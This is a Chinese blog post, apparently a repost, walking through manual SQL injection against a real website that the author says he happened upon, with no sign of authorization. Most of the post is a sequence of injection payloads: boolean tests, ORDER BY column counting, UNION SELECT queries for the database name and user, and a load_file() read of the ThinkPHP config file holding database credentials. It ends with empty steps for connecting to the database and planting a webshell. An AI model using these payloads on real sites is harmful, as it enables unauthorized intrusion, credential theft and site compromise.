偶然得到一个站,顺便练习一下手注,记录一下过程
网站url结构:
是不是类似index.php?pid=2,感觉有猫腻的话就顺手试一下。
改变url为
发现未屏蔽报错,且暴露了部分信息
可以得出数据库为mysql,且网站框架为tp,基本可以确定是伪静态了,这就意味着/index/pid/2.html等同于/index?pid=2.
先fuzz一下有没有被waf的关键字,很快乐,一个都没被waf掉
开始注入:
1、payload:index?pid=2’and ‘1’ = ‘1,网页正常。
2、payload:index?pid=2’and ‘1’ = ‘2,网页报错。确定注入点存在且为字符型注入。
3、猜字段:payload: index?pid=2′)order by 1 — +,网页未报错。
payload: index?pid=2′)order by 2 — +,网页未报错。
payload: index?pid=2′)order by 3 — +,网页未报错。
payload: index?pid=2′)order by 4 — +,网页报错。
这里顺便说一下order by 的实质意义吧:order by 实际是猜查询出的列数,而不是表实际的列数。order by本来就是指定的结果如何order,针对的就是查询结果而不是原表。所以order by猜解得到的列数还跟在后端的逻辑有关。
详细可见 https://segmentfault.com/a/1190000002655427
4、查找可显示字段:
payload: index?pid=-2′)union select 1,2,3 — +。
5、查询当前数据库:
payload: index?pid=-2′)union select 1,database(),3 — +。
6、查询当前用户权限:
payload: index?pid=-2′)union select 1,user(),3 — +。
7、 利用报错得到的路径信息,结合ThinkPHP的目录结构,依次测试可能路径。发现配置文件在此路径下。
读文件/alidata/www/Application/Common/Conf/config.php成功得到了数据库的配置文件。
payload: index?pid=-2′)union select 1,load_file(0x2f616c69646174612f7777772f4170706c69636174696f6e2f436f6d6d6f6e2f436f6e662f636f6e6669672e706870),3 — +
8、远程连接数据库:
9、写个小马儿:
10、连接:
GG ······
原文:https://www.cnblogs.com/pureqh/p/10911828.html